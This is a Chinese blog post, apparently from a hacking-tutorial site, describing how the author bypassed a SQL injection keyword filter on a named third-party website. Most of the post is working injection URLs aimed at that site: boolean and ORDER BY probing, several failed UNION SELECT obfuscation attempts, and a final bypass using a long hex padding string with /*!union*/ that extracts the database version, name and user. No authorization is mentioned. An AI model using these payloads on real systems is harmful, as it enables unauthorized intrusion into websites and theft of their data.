一个突破SQL注入关键词过滤的另类方法

前几今天遇到一个bt 的注射点(此注入点使用目前流行的注射工具都射不了):

http://xuehai.net/index.php?content=more_product&id=17
http://xuehai.net/index.php?content=more_product&id=17 and 1=1 正常
http://xuehai.net/index.php?content=more_product&id=17 and 1=2 报错

如图:

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

http://xuehai.net/index.php?content=more_product&id=17 order by 6 正常
http://xuehai.net/index.php?content=more_product&id=17 order by 7 错误

如图:

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

继续按照常规的手法注射:

http://xuehai.net/index.php?content=more_product&id=-17+UNION+SELECT+1,2,3,4,5,6–

如图:

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

错误nnd,过滤了UNION+SELECT 我们来加点特殊的字符看看能不能绕过:

http://xuehai.net/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,2,3,4,5,6–

如图:

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

悲剧还是绕不过去 – -,于是尝试自己知道的绕过方法继续射…

http://xuehai.net/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6–

如图:

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

继续:

http://xuehai.net/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+concat(s,e,l,e,c,t)+all+1,2,3,4,5,6–

如图:

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

http://xuehai.net/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-

如图:

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

靠,老外果然牛B 那么继续射

http://xuehai.net/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6–+-

如图:成功得到系统版本、当前数据库用户、用户名

一个突破SQL注入关键词过滤的另类方法

突破SQL注入过滤限制

至此终于成功突破SQL注入过滤Union+SELECT。

相关文章:

  • 2021-11-30
  • 2021-05-21
  • 2021-09-17
  • 2022-12-23
  • 2022-01-28
  • 2022-12-23
  • 2021-10-05
  • 2022-02-10
猜你喜欢
  • 2021-11-05
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode